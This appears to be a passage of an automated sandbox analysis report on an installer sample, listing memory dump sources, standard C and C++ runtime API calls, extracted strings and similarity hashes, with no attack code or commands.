                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.1942402006.000000006C12B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C12B000, based on PE: true
                             • Associated: 00000006.00000002.1943055227.000000006C1F6000.00000004.00000001.01000000.00000009.sdmp
                             • Associated: 00000006.00000002.1943085177.000000006C1FC000.00000020.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6bf70000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: __aulldiv$H_prolog
                            • String ID: >WJ$x$x
                            • API String ID: 2300968129-3162267903
                            • Opcode ID: 949a4121937ebe046e830a9d183576ad129ffcf0ce56193b78953cd7febb835e
                            • Instruction ID: 2a22ad0319af3de643d54bd32378dc25cacea4c6728c5a0c3a4b2f7247789d34
                            • Opcode Fuzzy Hash: 949a4121937ebe046e830a9d183576ad129ffcf0ce56193b78953cd7febb835e
                            • Instruction Fuzzy Hash: E512AB71D0020AEFDF10DFA8C990AEDBBB9FF58318F248169E919AB650CB359945CF50
                            APIs
                            • _ValidateLocalCookies.LIBCMT ref: 6C0FD1F7
                            • ___except_validate_context_record.LIBVCRUNTIME ref: 6C0FD1FF
                            • _ValidateLocalCookies.LIBCMT ref: 6C0FD288
                            • __IsNonwritableInCurrentImage.LIBCMT ref: 6C0FD2B3
                            • _ValidateLocalCookies.LIBCMT ref: 6C0FD308
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.1941249349.000000006BF71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF70000, based on PE: true
                             • Associated: 00000006.00000002.1941229763.000000006BF70000.00000002.00000001.01000000.00000009.sdmp
                             • Associated: 00000006.00000002.1942340197.000000006C11B000.00000002.00000001.01000000.00000009.sdmp
                             • Associated: 00000006.00000002.1942402006.000000006C12B000.00000008.00000001.01000000.00000009.sdmp
                             • Associated: 00000006.00000002.1943055227.000000006C1F6000.00000004.00000001.01000000.00000009.sdmp
                             • Associated: 00000006.00000002.1943085177.000000006C1FC000.00000020.00000001.01000000.00000009.sdmp
                             • Associated: 00000006.00000002.1943769712.000000006C2E7000.00000002.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6bf70000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                            • String ID: csm
                            • API String ID: 1170836740-1018135373
                            • Opcode ID: 2ba28cb210c56ef4064bf28510286617c7e30f823276184cfe2248fba659d674
                            • Instruction ID: 1d3873aba04cb27ce9418a763dd596181ebcc3a717547bb6ce04ffd1a526b152
                            • Opcode Fuzzy Hash: 2ba28cb210c56ef4064bf28510286617c7e30f823276184cfe2248fba659d674
                            • Instruction Fuzzy Hash: 8B418D34A01319ABCB00DF68C884B9E7BF5AF45328F148155ED389BB51DB31EA4ACBD1
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.1941249349.000000006BF71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF70000, based on PE: true
                             • Associated: 00000006.00000002.1941229763.000000006BF70000.00000002.00000001.01000000.00000009.sdmp
                             • Associated: 00000006.00000002.1942340197.000000006C11B000.00000002.00000001.01000000.00000009.sdmp
                             • Associated: 00000006.00000002.1942402006.000000006C12B000.00000008.00000001.01000000.00000009.sdmp
                             • Associated: 00000006.00000002.1943055227.000000006C1F6000.00000004.00000001.01000000.00000009.sdmp
                             • Associated: 00000006.00000002.1943085177.000000006C1FC000.00000020.00000001.01000000.00000009.sdmp
                             • Associated: 00000006.00000002.1943769712.000000006C2E7000.00000002.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6bf70000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID:
                            • String ID: api-ms-$ext-ms-
                            • API String ID: 0-537541572
                            • Opcode ID: aa3d807050b525990be3d813b561ac968528076771a5457fa88fe4fb469e2f7e
                            • Instruction ID: 09d68f9dab81ce361c55e0696fbe48c3d213431859e730e82461b3bb3fb4b1f2
                            • Opcode Fuzzy Hash: aa3d807050b525990be3d813b561ac968528076771a5457fa88fe4fb469e2f7e
                            • Instruction Fuzzy Hash: A421BB76F05215FBDB118A79CC44B4B37B49B227B8F160621E815A7680DE38ED43D6E0
                            APIs
                            • GetConsoleCP.KERNEL32(?,6C10E7C0,?), ref: 6C10F5E9
                            • __fassign.LIBCMT ref: 6C10F7C8
                            • __fassign.LIBCMT ref: 6C10F7E5
                            • WriteFile.KERNEL32(?,6C1191A6,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C10F82D
                            • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 6C10F86D
                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C10F919
                            Memory Dump Source
                            • Source File: 00000006.00000002.1941249349.000000006BF71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF70000, based on PE: true
                             • Associated: 00000006.00000002.1941229763.000000006BF70000.00000002.00000001.01000000.00000009.sdmp
                             • Associated: 00000006.00000002.1942340197.000000006C11B000.00000002.00000001.01000000.00000009.sdmp
                             • Associated: 00000006.00000002.1942402006.000000006C12B000.00000008.00000001.01000000.00000009.sdmp
                             • Associated: 00000006.00000002.1943055227.000000006C1F6000.00000004.00000001.01000000.00000009.sdmp
                             • Associated: 00000006.00000002.1943085177.000000006C1FC000.00000020.00000001.01000000.00000009.sdmp
                             • Associated: 00000006.00000002.1943769712.000000006C2E7000.00000002.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6bf70000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: FileWrite__fassign$ConsoleErrorLast
                            • String ID:
                            • API String ID: 4031098158-0
                            • Opcode ID: 1ef2dc438e177460814f9db1ab8e6707af3ec413628d8470abda26c767abae27
                            • Instruction ID: 6acea5bd8e8e1d80db71bc931635242e2bf8e7be61e3032a140005c7ff5e42bb
                            • Opcode Fuzzy Hash: 1ef2dc438e177460814f9db1ab8e6707af3ec413628d8470abda26c767abae27
                            • Instruction Fuzzy Hash: F1D1BB75E012489FDF11CFA8C890AEDBBB5BF49314F28416AE865BB341DB30A946CF54
                            APIs
                            • std::_Lockit::_Lockit.LIBCPMT ref: 6BFC2F95
                            • std::_Lockit::_Lockit.LIBCPMT ref: 6BFC2FAF
                            • std::_Lockit::~_Lockit.LIBCPMT ref: 6BFC2FD0
                            • __Getctype.LIBCPMT ref: 6BFC3084
                            • std::_Facet_Register.LIBCPMT ref: 6BFC309C
                            • std::_Lockit::~_Lockit.LIBCPMT ref: 6BFC30B7
                            Memory Dump Source
                            • Source File: 00000006.00000002.1941249349.000000006BF71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF70000, based on PE: true
                             • Associated: 00000006.00000002.1941229763.000000006BF70000.00000002.00000001.01000000.00000009.sdmp
                             • Associated: 00000006.00000002.1942340197.000000006C11B000.00000002.00000001.01000000.00000009.sdmp
                             • Associated: 00000006.00000002.1942402006.000000006C12B000.00000008.00000001.01000000.00000009.sdmp
                             • Associated: 00000006.00000002.1943055227.000000006C1F6000.00000004.00000001.01000000.00000009.sdmp
                             • Associated: 00000006.00000002.1943085177.000000006C1FC000.00000020.00000001.01000000.00000009.sdmp
                             • Associated: 00000006.00000002.1943769712.000000006C2E7000.00000002.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6bf70000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_GetctypeRegister
                            • String ID:
                            • API String ID: 1102183713-0
                            • Opcode ID: 2db35d923e1183b6971c27451d429bc18e84014a53934a6e34a85acfd93006d4
                            • Instruction ID: 020dbd19099d2de77f62c4380d05507ea7f9764567eb5b82993a31e73568c33a
                            • Opcode Fuzzy Hash: 2db35d923e1183b6971c27451d429bc18e84014a53934a6e34a85acfd93006d4
                            • Instruction Fuzzy Hash: 4C4167B2E002198FCB10CF98D854B9EB7F0FF44754F144169D829AB750D779AA85CBD2
                            APIs
                            Memory Dump Source
                            • Source File: 00000006.00000002.1942402006.000000006C12B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C12B000, based on PE: true
                             • Associated: 00000006.00000002.1943055227.000000006C1F6000.00000004.00000001.01000000.00000009.sdmp
                             • Associated: 00000006.00000002.1943085177.000000006C1FC000.00000020.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6bf70000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: __aulldiv$__aullrem
                            • String ID:
                            • API String ID: 2022606265-0
                            • Opcode ID: 1f394eef11d621d2b0abd6c005444ee54f283a007719147bbe3c0d60170dbe25
                            • Instruction ID: e0d3277be3df0922cd0516a464806aab047ffdf9aae5c5a8d02cab71b98e27ef
                            • Opcode Fuzzy Hash: 1f394eef11d621d2b0abd6c005444ee54f283a007719147bbe3c0d60170dbe25
                            • Instruction Fuzzy Hash: 6E219570641229FFEF119F94CC40EDF7A69EB517ACF208227B628A1590D275CD60DA61
                            APIs
                            • __EH_prolog.LIBCMT ref: 6C13D6F1
                              • Part of subcall function 6C14C173: __EH_prolog.LIBCMT ref: 6C14C178
                            • __EH_prolog.LIBCMT ref: 6C13D8F9
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.1942402006.000000006C12B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C12B000, based on PE: true
                             • Associated: 00000006.00000002.1943055227.000000006C1F6000.00000004.00000001.01000000.00000009.sdmp
                             • Associated: 00000006.00000002.1943085177.000000006C1FC000.00000020.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6bf70000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: H_prolog
                            • String ID: IJ$WIJ$J
                            • API String ID: 3519838083-740443243
                            • Opcode ID: 6052f957e2ecb8a4b70827f611eacceb93b83a0f35a243b049cc0090dc05215c
                            • Instruction ID: 1674db2fa06b40af4c9a43fc2f8d17e09e0bb792a8689483594a21c8ce4257c5
                            • Opcode Fuzzy Hash: 6052f957e2ecb8a4b70827f611eacceb93b83a0f35a243b049cc0090dc05215c
                            • Instruction Fuzzy Hash: 4C71A130910264DFDB14EFA4C444BDDB7B5BF2530CF1080A9E8596BB91CB78BA49CB91
                            APIs
                            • _free.LIBCMT ref: 6C1191CD
                            • _free.LIBCMT ref: 6C1191F6
                            • SetEndOfFile.KERNEL32(00000000,6C117DDC,00000000,6C10E7C0,?,?,?,?,?,?,?,6C117DDC,6C10E7C0,00000000), ref: 6C119228
                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,6C117DDC,6C10E7C0,00000000,?,?,?,?,00000000,?), ref: 6C119244
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.1941249349.000000006BF71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF70000, based on PE: true
                             • Associated: 00000006.00000002.1941229763.000000006BF70000.00000002.00000001.01000000.00000009.sdmp
                             • Associated: 00000006.00000002.1942340197.000000006C11B000.00000002.00000001.01000000.00000009.sdmp
                             • Associated: 00000006.00000002.1942402006.000000006C12B000.00000008.00000001.01000000.00000009.sdmp
                             • Associated: 00000006.00000002.1943055227.000000006C1F6000.00000004.00000001.01000000.00000009.sdmp
                             • Associated: 00000006.00000002.1943085177.000000006C1FC000.00000020.00000001.01000000.00000009.sdmp
                             • Associated: 00000006.00000002.1943769712.000000006C2E7000.00000002.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6bf70000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: _free$ErrorFileLast
                            • String ID: 8Q
                            • API String ID: 1547350101-4022487301
                            • Opcode ID: ef05d9f9ef414a8b94643c186a676b351a0e92c9df6c46b7d7081cc32b697d82
                            • Instruction ID: 815760f664a946c19c11c820e8f30c0ec832df3d3d7bda001b6eace29447cf8c
                            • Opcode Fuzzy Hash: ef05d9f9ef414a8b94643c186a676b351a0e92c9df6c46b7d7081cc32b697d82
                            • Instruction Fuzzy Hash: EB41D732A09605ABDB019FB8CC54BCE37B9AF46334F150525E934A7F90EF39D8894761
                            APIs
                            • __EH_prolog.LIBCMT ref: 6C15141D
                              • Part of subcall function 6C151E40: __EH_prolog.LIBCMT ref: 6C151E45
                              • Part of subcall function 6C1518EB: __EH_prolog.LIBCMT ref: 6C1518F0
                              • Part of subcall function 6C151593: __EH_prolog.LIBCMT ref: 6C151598
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.1942402006.000000006C12B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C12B000, based on PE: true
                             • Associated: 00000006.00000002.1943055227.000000006C1F6000.00000004.00000001.01000000.00000009.sdmp
                             • Associated: 00000006.00000002.1943085177.000000006C1FC000.00000020.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6bf70000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: H_prolog
                            • String ID: &qB$0aJ$A0$XqB
                            • API String ID: 3519838083-1326096578
                            • Opcode ID: 37b22e6d00aae0832323933771e16052884702a18d16bc22ef1d28b2cb01d7a1
                            • Instruction ID: bdef2d712ce1ed56bd36b7a299ac8bb78f3955ff623cbb8cb958bce49a95a0c4
                            • Opcode Fuzzy Hash: 37b22e6d00aae0832323933771e16052884702a18d16bc22ef1d28b2cb01d7a1
                            • Instruction Fuzzy Hash: E221BBB1D01258AECF05DFE4D991AECBBB5AF25308F200069D41223780DB784E4CCB61
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.1942402006.000000006C12B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C12B000, based on PE: true
                             • Associated: 00000006.00000002.1943055227.000000006C1F6000.00000004.00000001.01000000.00000009.sdmp
                             • Associated: 00000006.00000002.1943085177.000000006C1FC000.00000020.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6bf70000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: H_prolog
                            • String ID: J$0J$DJ$`J
                            • API String ID: 3519838083-2453737217
                            • Opcode ID: 94eb96797db7bdd6310de836df89d4e5c2fb6b25f25e237953e0bbd1ee8067ab
                            • Instruction ID: b05fcdf49311fdae6694b2708eee3aa08fabf20b6053db07acabc1bfff837457
                            • Opcode Fuzzy Hash: 94eb96797db7bdd6310de836df89d4e5c2fb6b25f25e237953e0bbd1ee8067ab
                            • Instruction Fuzzy Hash: FB11F2B0900B64CEC720CF5AC45029AFBE4BFA6708B10C90FC0A687B10C7F8A549CB99
                            APIs
                            • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,6C1028A4,00000000,?,6C102925,6C0FD339,00000003,00000000), ref: 6C10282F
                            • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 6C102842
                            • FreeLibrary.KERNEL32(00000000,?,?,6C1028A4,00000000,?,6C102925,6C0FD339,00000003,00000000), ref: 6C102865
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.1941249349.000000006BF71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF70000, based on PE: true
                             • Associated: 00000006.00000002.1941229763.000000006BF70000.00000002.00000001.01000000.00000009.sdmp
                             • Associated: 00000006.00000002.1942340197.000000006C11B000.00000002.00000001.01000000.00000009.sdmp
                             • Associated: 00000006.00000002.1942402006.000000006C12B000.00000008.00000001.01000000.00000009.sdmp
                             • Associated: 00000006.00000002.1943055227.000000006C1F6000.00000004.00000001.01000000.00000009.sdmp
                             • Associated: 00000006.00000002.1943085177.000000006C1FC000.00000020.00000001.01000000.00000009.sdmp
                             • Associated: 00000006.00000002.1943769712.000000006C2E7000.00000002.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6bf70000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: AddressFreeHandleLibraryModuleProc
                            • String ID: CorExitProcess$mscoree.dll
                            • API String ID: 4061214504-1276376045
                            • Opcode ID: 427a95f39cc694b2eeba334d5c162e3c34c1cc9fe721b417f892e207e7bce04c
                            • Instruction ID: d0f61bd41862f272808859b0edfdb9a579bc5336b467dae22628202d5628839b
                            • Opcode Fuzzy Hash: 427a95f39cc694b2eeba334d5c162e3c34c1cc9fe721b417f892e207e7bce04c
                            • Instruction Fuzzy Hash: 2EF08C38711119FBDF11AB60DC0DB9EBBBCFB0135AF110066A810B2464CF388A91EB90
                            APIs
                            • __EH_prolog3.LIBCMT ref: 6C0FAA1E
                            • std::_Lockit::_Lockit.LIBCPMT ref: 6C0FAA29
                            • std::_Lockit::~_Lockit.LIBCPMT ref: 6C0FAA97
                              • Part of subcall function 6C0FA920: std::locale::_Locimp::_Locimp.LIBCPMT ref: 6C0FA938
                            • std::locale::_Setgloballocale.LIBCPMT ref: 6C0FAA44
                            • _Yarn.LIBCPMT ref: 6C0FAA5A
                            Memory Dump Source
                            • Source File: 00000006.00000002.1941249349.000000006BF71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF70000, based on PE: true
                             • Associated: 00000006.00000002.1941229763.000000006BF70000.00000002.00000001.01000000.00000009.sdmp
                             • Associated: 00000006.00000002.1942340197.000000006C11B000.00000002.00000001.01000000.00000009.sdmp
                             • Associated: 00000006.00000002.1942402006.000000006C12B000.00000008.00000001.01000000.00000009.sdmp
                             • Associated: 00000006.00000002.1943055227.000000006C1F6000.00000004.00000001.01000000.00000009.sdmp
                             • Associated: 00000006.00000002.1943085177.000000006C1FC000.00000020.00000001.01000000.00000009.sdmp
                             • Associated: 00000006.00000002.1943769712.000000006C2E7000.00000002.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6bf70000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
                            • String ID:
                            • API String ID: 1088826258-0
                            • Opcode ID: b9cd46547c1e4a6d88c5db77254c43a4c59048f23d59b2e1097891d79fbfd52b
                            • Instruction ID: becbe4a580806206a2f33c22498d37955f21bba1d5584976f4ca3ed3f9718e03
                            • Opcode Fuzzy Hash: b9cd46547c1e4a6d88c5db77254c43a4c59048f23d59b2e1097891d79fbfd52b
                            • Instruction Fuzzy Hash: D1019A79B102109BCB06DB208854ABD7BF1FF85248B280149DC2117B80DF38AA8BDBC1
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.1942402006.000000006C12B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C12B000, based on PE: true
                             • Associated: 00000006.00000002.1943055227.000000006C1F6000.00000004.00000001.01000000.00000009.sdmp
                             • Associated: 00000006.00000002.1943085177.000000006C1FC000.00000020.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6bf70000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: H_prolog
                            • String ID: $!$@
                            • API String ID: 3519838083-2517134481
                            • Opcode ID: de11a10d9dafd4c65deb6d7f74020d514e490535ea8bbecf2d37e3263791df61
                            • Instruction ID: 98e67972a09fbb7ef98819dc0d08e1c42791de3b081c8603383b0f21b3dafcd6
                            • Opcode Fuzzy Hash: de11a10d9dafd4c65deb6d7f74020d514e490535ea8bbecf2d37e3263791df61
                            • Instruction Fuzzy Hash: 17127A74E06249DFCB24CFA4C4A0ADDBBB1FF09308F14946AE445ABB51DB35E949CB60
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.1942402006.000000006C12B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C12B000, based on PE: true
                             • Associated: 00000006.00000002.1943055227.000000006C1F6000.00000004.00000001.01000000.00000009.sdmp
                             • Associated: 00000006.00000002.1943085177.000000006C1FC000.00000020.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6bf70000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: H_prolog__aulldiv
                            • String ID: $SJ
                            • API String ID: 4125985754-3948962906
                            • Opcode ID: 589161b9174e713d87cd7ea6b7fb48598b4f41844aead815dae59d281551bb28
                            • Instruction ID: 927f5817be227f32f65d6eadc70fc86c5c4baa0bc101835cd90a1397a2bec0e6
                            • Opcode Fuzzy Hash: 589161b9174e713d87cd7ea6b7fb48598b4f41844aead815dae59d281551bb28
                            • Instruction Fuzzy Hash: 3AB11BB1E01209DFCB14CF95C890AAEFBB5FF58318F60852EE516A7B50D734AA45CB90
                            APIs
                              • Part of subcall function 6C0FAA17: __EH_prolog3.LIBCMT ref: 6C0FAA1E
                              • Part of subcall function 6C0FAA17: std::_Lockit::_Lockit.LIBCPMT ref: 6C0FAA29
                              • Part of subcall function 6C0FAA17: std::locale::_Setgloballocale.LIBCPMT ref: 6C0FAA44
                              • Part of subcall function 6C0FAA17: _Yarn.LIBCPMT ref: 6C0FAA5A
                              • Part of subcall function 6C0FAA17: std::_Lockit::~_Lockit.LIBCPMT ref: 6C0FAA97
                              • Part of subcall function 6BFC2F60: std::_Lockit::_Lockit.LIBCPMT ref: 6BFC2F95
                              • Part of subcall function 6BFC2F60: std::_Lockit::_Lockit.LIBCPMT ref: 6BFC2FAF
                              • Part of subcall function 6BFC2F60: std::_Lockit::~_Lockit.LIBCPMT ref: 6BFC2FD0
                              • Part of subcall function 6BFC2F60: __Getctype.LIBCPMT ref: 6BFC3084
                              • Part of subcall function 6BFC2F60: std::_Facet_Register.LIBCPMT ref: 6BFC309C
                              • Part of subcall function 6BFC2F60: std::_Lockit::~_Lockit.LIBCPMT ref: 6BFC30B7
                            • std::ios_base::_Addstd.LIBCPMT ref: 6BFC211B
                            Strings
                            Memory Dump Source
                            • Source File: 00000006.00000002.1941249349.000000006BF71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF70000, based on PE: true
                             • Associated: 00000006.00000002.1941229763.000000006BF70000.00000002.00000001.01000000.00000009.sdmp
                             • Associated: 00000006.00000002.1942340197.000000006C11B000.00000002.00000001.01000000.00000009.sdmp
                             • Associated: 00000006.00000002.1942402006.000000006C12B000.00000008.00000001.01000000.00000009.sdmp
                             • Associated: 00000006.00000002.1943055227.000000006C1F6000.00000004.00000001.01000000.00000009.sdmp
                             • Associated: 00000006.00000002.1943085177.000000006C1FC000.00000020.00000001.01000000.00000009.sdmp
                             • Associated: 00000006.00000002.1943769712.000000006C2E7000.00000002.00000001.01000000.00000009.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_6_2_6bf70000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                            Similarity
                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$AddstdFacet_GetctypeH_prolog3RegisterSetgloballocaleYarnstd::ios_base::_std::locale::_
                            • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                            Memory Dump Source
                            • Source File: 00000006.00000002.1942402006.000000006C12B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C12B000, based on PE: true
                            Similarity
                            • API ID: H_prolog
                            • String ID: $CK$CK
                            Memory Dump Source
                            • Source File: 00000006.00000002.1942402006.000000006C12B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C12B000, based on PE: true
                            Similarity
                            • API ID: H_prolog
                            • String ID: 0$LrJ$x
                            APIs
                            • __EH_prolog.LIBCMT ref: 6C157ECC
                              • Part of subcall function 6C14258A: __EH_prolog.LIBCMT ref: 6C14258F
                            Memory Dump Source
                            • Source File: 00000006.00000002.1942402006.000000006C12B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C12B000, based on PE: true
                            Similarity
                            • API ID: H_prolog
                            • String ID: :hJ$dJ$xJ
                            APIs
                            • SetFilePointerEx.KERNEL32(00000000,?,00000000,6C10E7C0,6BFC1DEA,00008000,6C10E7C0,?,?,?,6C10E36F,6C10E7C0,?,00000000,6BFC1DEA), ref: 6C10E4B9
                            • GetLastError.KERNEL32(?,?,?,6C10E36F,6C10E7C0,?,00000000,6BFC1DEA,?,6C117D8E,6C10E7C0,000000FF,000000FF,00000002,00008000,6C10E7C0), ref: 6C10E4C3
                            • __dosmaperr.LIBCMT ref: 6C10E4CA
                            Memory Dump Source
                            • Source File: 00000006.00000002.1941249349.000000006BF71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF70000, based on PE: true
                            Similarity
                            • API ID: ErrorFileLastPointer__dosmaperr
                            • String ID: 8Q
                            Memory Dump Source
                            • Source File: 00000006.00000002.1942402006.000000006C12B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C12B000, based on PE: true
                            Similarity
                            • API ID:
                            • String ID: <J$DJ$HJ$TJ$]
                            Memory Dump Source
                            • Source File: 00000006.00000002.1942402006.000000006C12B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C12B000, based on PE: true
                            Similarity
                            • API ID: __aulldiv
                            • String ID:
                            APIs
                            • GetLastError.KERNEL32(00000008,?,00000000,6C10BB43), ref: 6C1080A7
                            • _free.LIBCMT ref: 6C108104
                            • _free.LIBCMT ref: 6C10813A
                            • SetLastError.KERNEL32(00000000,00000008,000000FF), ref: 6C108145
                            Memory Dump Source
                            • Source File: 00000006.00000002.1941249349.000000006BF71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF70000, based on PE: true
                            Similarity
                            • API ID: ErrorLast_free
                            • String ID:
                            APIs
                            • WriteConsoleW.KERNEL32(00000000,?,6C117DDC,00000000,00000000,?,6C118241,00000000,00000001,00000000,6C10E7C0,?,6C10F976,?,?,6C10E7C0), ref: 6C1195C1
                            • GetLastError.KERNEL32(?,6C118241,00000000,00000001,00000000,6C10E7C0,?,6C10F976,?,?,6C10E7C0,?,6C10E7C0,?,6C10F40C,6C1191A6), ref: 6C1195CD
                              • Part of subcall function 6C11961E: CloseHandle.KERNEL32(FFFFFFFE,6C1195DD,?,6C118241,00000000,00000001,00000000,6C10E7C0,?,6C10F976,?,?,6C10E7C0,?,6C10E7C0), ref: 6C11962E
                            • ___initconout.LIBCMT ref: 6C1195DD
                              • Part of subcall function 6C1195FF: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,6C11959B,6C11822E,6C10E7C0,?,6C10F976,?,?,6C10E7C0,?), ref: 6C119612
                            • WriteConsoleW.KERNEL32(00000000,?,6C117DDC,00000000,?,6C118241,00000000,00000001,00000000,6C10E7C0,?,6C10F976,?,?,6C10E7C0,?), ref: 6C1195F2
                            Memory Dump Source
                            • Source File: 00000006.00000002.1941249349.000000006BF71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF70000, based on PE: true
                            Similarity
                            • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                            • String ID:
                            APIs
                            • __EH_prolog.LIBCMT ref: 6C131077
                              • Part of subcall function 6C130FF5: __EH_prolog.LIBCMT ref: 6C130FFA
                            Memory Dump Source
                            • Source File: 00000006.00000002.1942402006.000000006C12B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C12B000, based on PE: true
                            Similarity
                            • API ID: H_prolog
                            • String ID: :$\
                            Memory Dump Source
                            • Source File: 00000006.00000002.1942402006.000000006C12B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C12B000, based on PE: true
                            Similarity
                            • API ID: H_prolog__aullrem
                            • String ID: d%K
                            Memory Dump Source
                            • Source File: 00000006.00000002.1941249349.000000006BF71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF70000, based on PE: true
                            Similarity
                            • API ID: H_prolog3_
                            • String ID: 8Q
                            Memory Dump Source
                            • Source File: 00000006.00000002.1942402006.000000006C12B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C12B000, based on PE: true
                            Similarity
                            • API ID: H_prolog
                            • String ID: @$hfJ
                            APIs
                            • __EH_prolog.LIBCMT ref: 6C14BC5D
                              • Part of subcall function 6C14A61A: __EH_prolog.LIBCMT ref: 6C14A61F
                              • Part of subcall function 6C14AA2E: __EH_prolog.LIBCMT ref: 6C14AA33
                              • Part of subcall function 6C14BEA5: __EH_prolog.LIBCMT ref: 6C14BEAA
                            Memory Dump Source
                            • Source File: 00000006.00000002.1942402006.000000006C12B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C12B000, based on PE: true
                            Similarity
                            • API ID: H_prolog
                            • String ID: WZJ
                            APIs
                            • ___std_exception_destroy.LIBVCRUNTIME ref: 6BFC2A76
                            Memory Dump Source
                            • Source File: 00000006.00000002.1941249349.000000006BF71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF70000, based on PE: true
                            Similarity
                            • API ID: ___std_exception_destroy
                            • String ID: Jbx$Jbx
                            Memory Dump Source
                            • Source File: 00000006.00000002.1942402006.000000006C12B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C12B000, based on PE: true
                            Similarity
                            • API ID: H_prolog
                            • String ID: <dJ$Q
                            Memory Dump Source
